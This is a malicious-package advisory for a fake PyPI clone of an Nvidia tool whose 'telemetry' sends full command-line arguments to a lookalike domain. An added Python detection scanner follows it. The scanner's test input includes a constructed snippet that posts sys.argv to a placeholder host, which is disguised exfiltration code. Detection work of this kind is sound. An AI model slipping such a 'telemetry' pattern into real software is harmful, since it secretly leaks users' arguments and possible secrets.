
skillspector @2.3.10

Vulnerability report · Last retrieved from osv.dev June 28, 2026 at 10:54 PM UTC

Malicious

OSV ID

MAL-2026-6561

Ecosystem

pypi

Summary

This package is a modified, unofficial version of the Nvidia project (https://github.com/NVIDIA/skillspector). The modification is disguised as telemetry: the redistributor's README describes it as opt-in, anonymous usage reporting of selected data. In fact the "telemetry" uses a default domain suggesting it belongs to Nvidia's LiveKit project and exfiltrates the full command arguments on every CLI invocation.

Category: MALICIOUS. The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-skillspector

Reasons (based on the campaign):
- clones-real-package
- exfiltration-generic: the package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- dependency-confusion

Source: kam193 (939ac54a8a665e3e0c6f1c33a59d8a3afb0d3d2c827c30a701973777cd39ff19)
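As an added illustration (this is not code from the skillspector package, the NVIDIA project, or the OSV report), the following static check looks for the pattern the report describes: a function that reads sys.argv in the same scope as an outbound HTTP call, plus any hard-coded URL whose host lies outside the vendor domains you expect. Both input modules are constructed for the example; the hosts example-cloud.net and example.com are placeholders, and the list of recognised HTTP entry points is an assumption you would extend for your own code base.

```python
"""Flag 'telemetry' that ships CLI arguments off-host (added example, not project code)."""
import ast
from urllib.parse import urlparse

# Outbound HTTP entry points the scanner recognises, fully qualified (assumed list).
OUTBOUND_CALLS = {
    "urllib.request.urlopen", "urllib.request.Request",
    "requests.get", "requests.post", "requests.put",
    "httpx.get", "httpx.post", "httpx.put",
    "http.client.HTTPSConnection", "http.client.HTTPConnection",
}


def _collect_aliases(tree):
    """Map local names to the module path they were imported from."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name           # import urllib.request as ur
                else:
                    root = a.name.split(".")[0]          # import urllib.request -> urllib
                    aliases[root] = root
        elif isinstance(node, ast.ImportFrom):
            for a in node.names:                         # from sys import argv -> sys.argv
                aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}".lstrip(".")
    return aliases


def _qualname(node, aliases):
    """Resolve a Name/Attribute chain such as ur.urlopen to urllib.request.urlopen."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join([aliases.get(node.id, node.id), *reversed(parts)])


def _analyse_block(name, stmts, aliases, findings):
    """Record a finding when one scope both reads sys.argv and makes an outbound call."""
    reads_argv, outbound = False, set()
    for stmt in stmts:
        for node in ast.walk(stmt):
            if isinstance(node, (ast.Attribute, ast.Name)) and _qualname(node, aliases) == "sys.argv":
                reads_argv = True
            if isinstance(node, ast.Call) and _qualname(node.func, aliases) in OUTBOUND_CALLS:
                outbound.add(_qualname(node.func, aliases))
    if reads_argv and outbound:
        for call in sorted(outbound):
            findings.append(("argv-to-network", name, call))


def _host_allowed(host, expected_hosts):
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in expected_hosts)


def scan_module(source, expected_hosts=()):
    """Return findings as tuples: (kind, scope-or-host, call-or-url)."""
    tree = ast.parse(source)
    aliases = _collect_aliases(tree)
    findings = []
    defs = (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)
    _analyse_block("<module>", [n for n in tree.body if not isinstance(n, defs)], aliases, findings)
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            _analyse_block(node.name, node.body, aliases, findings)
    for node in ast.walk(tree):  # hard-coded endpoints outside the expected vendor domains
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            u = urlparse(node.value)
            if u.scheme in ("http", "https") and u.hostname and not _host_allowed(u.hostname, expected_hosts):
                findings.append(("unexpected-host", u.hostname, node.value))
    return findings


# Constructed sample: "telemetry" that posts the full argv to a lookalike host.
SUSPECT_MODULE = '''
import sys, json
import urllib.request
TELEMETRY_URL = "https://telemetry.example-cloud.net/v1/events"
def report_usage():
    payload = json.dumps({"args": sys.argv}).encode()
    req = urllib.request.Request(TELEMETRY_URL, data=payload)
    urllib.request.urlopen(req, timeout=2)
def main():
    report_usage()
'''

# Constructed sample: opt-in telemetry that sends only a version string to the expected domain.
BENIGN_MODULE = '''
import os
import requests
def report_usage(version):
    if os.environ.get("TOOL_TELEMETRY") != "1":
        return
    requests.post("https://telemetry.example.com/ping", json={"version": version}, timeout=2)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_MODULE), ("benign", BENIGN_MODULE)):
        print(label, scan_module(src, expected_hosts=("example.com",)))
```

The check is deliberately coarse: co-occurrence of a sys.argv read and a network call in one scope, not taint tracking, so it over-reports on legitimate tools and is meant as a triage filter over a freshly installed site-packages directory, not a verdict. Run it against an unofficial fork and compare its output with the same scan of the upstream project; a new outbound endpoint or a new argv reader in the fork is exactly the kind of "telemetry" addition this report describes.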
